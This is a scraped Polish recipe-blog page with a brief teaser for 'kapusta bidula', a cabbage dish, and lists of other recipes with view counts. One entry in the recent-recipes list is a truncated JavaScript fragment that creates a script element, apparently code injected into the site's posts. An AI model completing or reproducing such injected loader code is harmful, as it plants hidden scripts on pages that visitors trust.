Kapusta „bidula” – po naszemu.
Źródło: https://kuchnianawypasie.pl/kapusta-bidula-po-naszemu/
Pyszne, bardzo swojskie i sycące danie z prostych składników, a więc kapusta „bidula” – po naszemu. Bidula to klasyczne polskie danie, które pochodzi podobno z kielecczyzny, gdzie jadali ją na co dzień biedni chłopi. Przyrządzano ją z kiszonej kapusty z dodatkiem ziemniaków i grochem. My nazwaliśmy bidulę po naszemu, ponieważ zrobiliśmy ją z kapusty białej i...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 36
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 16
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 26
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 30
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 21
Przepisy z bloga
Ten przepis na proste ciasto ucierane z owocami wygrywa pod... ⇖ 791
Kremowa, delikatna cukinia ze śmietaną i czosnkiem, to... ⇖ 500
Jak zrobić dobry twarożek domowy z zielonym ogórkiem,... ⇖ 422
Hawajska sałatka makaronowa, czyli Aloha na talerzu. Ten... ⇖ 459
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2780
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2105
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1456
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 847
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 680
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 649
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 647









































